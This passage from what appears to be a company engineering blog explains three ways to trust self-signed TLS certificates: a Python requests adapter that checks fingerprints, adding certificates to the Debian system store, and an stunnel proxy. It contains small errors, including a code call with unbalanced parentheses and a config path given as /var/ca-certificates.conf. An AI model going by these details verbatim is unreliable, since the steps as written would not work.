  s.mount('https://{}/'.format(host), FingerprintAdapter(fingerprint))

session = create_fingerprint_session(('https://example.com/a/b/c', '14:71:...')
response = session.get(url)
print(response.text)

Note that the verify setting must be set to False, otherwise, the requests library would also try to verify the SSL certificate using the conventional way, by the signature chain and the domain name.

(Note that the verify parameter may also be set to a location of a certificate file that contains a concatenated list of trusted certificates in PEM format. However, a self-signed certificate is signed by a custom Certificate Authority (CA), but the certificate of the CA is usually unknown to us. Thus, we do not use this option but set verify to False.)

All that remains now is to implement the FingerprintAdapter. The quickest way is to subclass HTTPAdapter class and to modify the methods that create an HTTPPoolConnection object to include the assert_fingerprint option:

from requests.adapters import HTTPAdapter

class FingerprintAdapter(HTTPAdapter):
  """
  A TransportAdapter that allows to verify certificates by fingerprint
  """
  def __init__(self, fingerprint, *args, **kwargs):
    self._fingerprint = fingerprint
    HTTPAdapter.__init__(self, *args, **kwargs)

  def init_poolmanager(self, *args, **kwargs):
    kwargs['assert_fingerprint'] = self._fingerprint
    return super().init_poolmanager(*args, **kwargs)

  def proxy_manager_for(self, *args, **kwargs):
    kwargs['assert_fingerprint'] = self._fingerprint
    return super().proxy_manager_for(*args, **kwargs)

In summary, set verify=True when working with certificates signed by a trusted CA, otherwise set verify=False and mount a FingerprintAdapter when verifying self-signed certificates by fingerprint. Test that the verification is working by altering the fingerprint value and observing a security error.

Method #2: Site-wide

What if you wished to use other tools, besides Python, to query web sites signed with self-signed certificates? A site-wide solution is to add the self-signed certificate to a list of trusted certificates if it's there, no further signature checking will be made by the verifier.

However, the downside of this method is that a compromised trusted third party could now sign certificates for any domain which all programs on the machine would trust. This is a significant security risk for a long-lived server, but it may be tolerable if "site-wide" does not extend beyond a Docker container which runs a program that only connects to one endpoint.

The following instructions are for Ubuntu or Debian; for other distributions, make necessary adjustments.

Look in directory /usr/share/ca-certificates and you will see the directory mozilla, with many certificate files inside it. Make your own subdirectory on the same nesting level, for instance, /usr/share/ca-certficates/custom and put in it self-signed certificates of interest in PEM format, stored as separate files with extension .crt. Next, edit /var/ca-certificates.conf and list the custom certificates after the mozilla certificates. For instance,

...
mozilla/USERTrust_RSA_Certification_Authority.crt
custom/example-com-self-signed.crt
custom/another-example-com-self-signed.crt

Next, run update-ca-certificates command. Once that's done, symlinks to your certificates would appear in /etc/ssl/certs directory. At this point, the curl tool would work to accept the self-signed certificate from example.com.

However, the fingerprint method described previously, had the advantage that it worked even if there was a domain name mismatch. A mismatch would happen if you queried the target HTTPs server by an IP address (e.g.https://1.2.3.4/a/b/). If this is your situation, you can add an entry to /etc/hosts file to query the web server using the precise domain name that is listed inside the self-signed certificate.

The side-wide method works for all tools that rely on the libopenssl library, which includes curl. However, it is not sufficient for Python's requests library since it does some of its own checking of certificates.

Method #3: Strip SSL

Another way to allow a variety of tools to access HTTPs websites signed by self-signed certificates is to access them through a trusted proxy server that would strip the SSL after verifying the legitimacy of the self-signed certificates using fingerprints. We could implement such a proxy server in Python using the techniques above. Alternatively, we could use a utility program called stunnel that stands for the "Universal SSL Tunnel."

First, prepare a connection.conf configuration file like this one:

pid = /var/run/stunnel1.pid
CApath = /etc/ssl/certs
foreground=yes

[connection1]
verifyChain=no
verifyPeer=yes
client=yes
accept=8081
connect=1.2.3.4:443
sni=example.com

Then, run stunnel with the configuration file as the argument to have https://example.com proxied as http://localhost:8081,

$ stunnel connection.conf >& output.log &
$ curl 'http://localhost:8081/a/b/c'

An important thing to notice in the example configuration file is the verifyChain and verifyPeer options. They combine to verify the certificate by a fingerprint only and would ignore an incomplete signature chain. These options were added to stunnel in July 2016, in version 5.34. Another thing to notice that the domain name doesn't matter. The sni parameter is used only to instruct the webserver which virtual host you are interested in, but it plays no role in validating the certificate.

To run stunnel site-wide make the following configuration changes: store the configuration as /etc/stunnel/stunnel.conf, remove the foreground=yes bit, set pid to /var/run/stunnel.pid and add additional connection sections as needed.

Summary

We have demonstrated three ways to work with self-signed certificates without compromising security. At Smarking, we are trusted by vendors of parking systems to protect their data, and we use such techniques to justify their trust.

To learn more about Smarking, visit www.smarking.com.